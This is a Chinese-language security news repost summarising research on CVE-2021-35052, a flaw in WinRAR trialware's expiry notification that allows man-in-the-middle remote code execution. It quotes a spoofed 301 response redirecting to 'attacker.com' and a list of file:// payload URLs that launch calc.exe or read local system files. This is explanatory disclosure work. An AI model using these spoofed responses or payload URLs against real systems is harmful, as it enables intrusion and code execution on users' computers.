安全動(dòng)態(tài)

WinRAR試用版曝嚴(yán)重漏洞:免費(fèi)軟件并不“免費(fèi)“

來(lái)源:聚銘網(wǎng)絡(luò)    發(fā)布時(shí)間:2021-10-22    瀏覽次數(shù):
 

信息來(lái)源:安全內(nèi)參


本文討論的是位于 WinRAR 試用版中的一個(gè)漏洞,它對(duì)管理第三方軟件具有重大影響。該漏洞可導(dǎo)致攻擊者攔截并修改發(fā)送到該試用版用戶的請(qǐng)求,從而在用戶計(jì)算機(jī)實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行。該漏洞的編號(hào)為 CVE-2021-35052。

背景

WinRAR 是一款用于管理 Windows 操作系統(tǒng)上文檔文件的應(yīng)用程序,可創(chuàng)建并解壓縮常見(jiàn)文檔格式如 RAR 和 ZIP。WinRAR 以試用軟件的形式分發(fā),可使用戶在規(guī)定期限內(nèi)試用全部功能,期限過(guò)后用戶可能還可以使用該應(yīng)用,不過(guò)某些特性會(huì)被禁用。

研究結(jié)果

研究人員指出,這個(gè)漏洞是偶然從 WinRAR 版本 5.70 中發(fā)現(xiàn)的。他們安裝并使用一段時(shí)間后,WinRAR 生成一個(gè) JavaScript錯(cuò)誤:

這一結(jié)果讓人驚訝,因?yàn)樵撳e(cuò)誤表明 IE 引擎正在渲染該錯(cuò)誤窗口。經(jīng)過(guò)幾次實(shí)驗(yàn)后,研究人員發(fā)現(xiàn)一旦試用期結(jié)束,則大概在每三次啟動(dòng) WinRAR.exe 應(yīng)用中,有一次就會(huì)出現(xiàn)這個(gè)通知窗口。該窗口使用的是 Borland C++ 的 mshtml.dll 實(shí)現(xiàn),這也是編寫(xiě) WinRAR 的語(yǔ)言。

研究員將本地 Burp Suite 作為默認(rèn)的 Windows 代理并嘗試攔截流量以及了解錯(cuò)誤發(fā)生的原因以及是否利用該錯(cuò)誤。由于請(qǐng)求是通過(guò) HTTPS 發(fā)送的,因此 WinRAR 用戶將收到關(guān)于Burp所使用的自簽名證書(shū)不正確的通知。然而,很多用戶會(huì)點(diǎn)擊 “Yes” 繼續(xù)使用該應(yīng)用。

從請(qǐng)求本身可看到WinRAR 應(yīng)用程序的版本 (5.7.0) 和架構(gòu) (x64):

GET/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1Accept: */*Accept-Language: ru-RUUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)Host: notifier.rarlab.comConnection: closeCookie: _wr=; _gid=; _ga=

修改對(duì)終端用戶的請(qǐng)求

接著,研究員嘗試修改 WinRAR 向用戶發(fā)送的響應(yīng)。研究人員并非每次都會(huì)使用惡意內(nèi)容攔截并更改默認(rèn)域名 “notifier.rarlab.com” 的響應(yīng),而是注意到如果響應(yīng)代碼被更改為 “301 永久移除“,之后重定向惡意域名 “attacker.com” 會(huì)被緩存,而所有請(qǐng)求將會(huì)去往 “attacker.com”。

HTTP/1.1301 Moved Permanentlycontent-length: 0Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64connection: close

遠(yuǎn)程代碼執(zhí)行

這種中間人攻擊要求進(jìn)行 ARP 欺騙,因此假定潛在攻擊者已經(jīng)能夠訪問(wèn)該網(wǎng)絡(luò)域名,則會(huì)將研究員置于 IE 安全區(qū)域的 Zone 1。研究人員通過(guò)多種不同的攻擊向量查看是否適用于這種訪問(wèn)權(quán)限。

file://10.0.12.34/applications/test.jar\\\\\\\\10.0.12.34/applications/test.jarfile://localhost/C:/windows/system32/drivers/etc/hostsfile:///C:/windows/system32/calc.exefile:///C:\\\\\\\\windows\\\\\\\\system.ini

如上代碼說(shuō)明了展現(xiàn)多種可能的攻擊向量的被欺騙響應(yīng),這些向量包括運(yùn)行應(yīng)用程序、檢索本地主機(jī)信息以及運(yùn)行計(jì)算器應(yīng)用程序。

多數(shù)攻擊向量是成功的,但應(yīng)當(dāng)注意到很多攻擊向量會(huì)觸發(fā)額外的 Windows 安全警告信息。要達(dá)到全面成功,需要用戶點(diǎn)擊“運(yùn)行“而非”取消‘。

然而,運(yùn)行某些文件類型時(shí)并不會(huì)出現(xiàn)安全警告信息,包括:.DOCX、.PDF、.PY 和 .RAR。

在 WinRAR 5.7 之前的版本中,利用漏洞 CVE-2018-20250 還可以實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行后果。

結(jié)論

組織機(jī)構(gòu)面臨的最大挑戰(zhàn)之一是管理第三方軟件。一旦安裝后第三方軟件就能夠讀、寫(xiě)和修改設(shè)備上的數(shù)據(jù),而這些設(shè)備能夠訪問(wèn)企業(yè)網(wǎng)絡(luò)。用戶不可能審計(jì)每個(gè)應(yīng)用程序是否可安裝,因此制定相關(guān)策略對(duì)于管理外部應(yīng)用程序相關(guān)風(fēng)險(xiǎn)以及平衡多種應(yīng)用程序的業(yè)務(wù)需求和風(fēng)險(xiǎn)就顯得十分重要。管理不當(dāng)可造成影響廣泛的后果。

原文鏈接

https://swarm.ptsecurity.com/winrars-vulnerable-trialware-when-free-software-isnt-free/


 
 

上一篇:美國(guó)政府將禁止向中國(guó)和俄羅斯出口黑客工具

下一篇:2021年10月22日聚銘安全速遞